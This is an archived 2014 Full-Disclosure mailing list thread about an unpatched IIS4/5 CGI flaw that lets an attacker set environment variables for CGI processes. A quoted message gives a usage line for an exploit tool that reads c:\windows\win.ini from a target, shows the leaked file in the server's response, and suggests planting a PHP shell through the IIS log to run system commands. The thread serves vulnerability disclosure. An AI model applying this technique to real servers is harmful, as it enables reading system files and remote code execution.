lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CALf7PjH9-aYGFe6tWwBqD=BU+XBQHnOczbj=_y7LMB1GVnvgBw@mail.gmail.com>
Date: Thu, 10 Apr 2014 15:19:52 +0800
From: YiFei Yang <le.concorde.4590@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: Re: [FD] iis cgi 0day

So, for you who doesn't read Chinese, here's the brief idea of the original
post.

It is a bug affecting IIS4/5 using CGI on Windows NT/2000. Microsoft is
aware of it and won't fix it.

The discovery of the bug was back in year 2011.

By exploiting this bug, the attacker can set arbitrary environment
variables for the CGI process on the target machine, which can be further
exploited to get sensitive information, or cause remote code execution.


2014-04-10 10:25 GMT+08:00 yuange <yuange1975@...mail.com>:

> Discovered in 2000 for IIS4\IIS5  0day.
>
>
>
> .php  ->  php.exe
>
> the exploit  file  ver 4.1.1  .
>
> http://seclists.org/fulldisclosure/2012/Apr/13
>
> usage:
>  iisexp411 127.0.0.1  /AprilFools'Day.php  PATH_TRANSLATED
>  c:\windows\win.ini
>
> yuan can get the file    c:\windows\win.ini
>
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Thu, 10 Apr 2014 02:11:37 GMT
> Connection: close
> X-Powered-By: PHP/4.0.0
> Content-type: text/html
>
> ; for 16-bit app support
> [fonts]
> [extensions]
> [mci extensions]
> [files]
> [Mail]
> MAPI=1
> [MCI Extensions.BAK]
> asf=MPEGVideo
> asx=MPEGVideo
> ivf=MPEGVideo
> m3u=MPEGVideo
> mp2v=MPEGVideo
> mp3=MPEGVideo
> mpv2=MPEGVideo
> wax=MPEGVideo
> wm=MPEGVideo
> wma=MPEGVideo
> wmv=MPEGVideo
> wvx=MPEGVideo
> [SciCalc]
> layout=0
>
>
> You can use the IIS log file write phpshell, execute the PHP call system
> cmd.
>
>
>
>
>
>
>
>
> > Date: Wed, 9 Apr 2014 23:11:28 +0300
> > From: kirils.solovjovs@...ils.com
> > To: yuange1975@...mail.com
> > Subject: Re: [FD] iis cgi 0day
> >
> > Sorry, I don't read Chinese.
> > How is this a 0day?
> >
> > --
> > Kirils Solovjovs
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ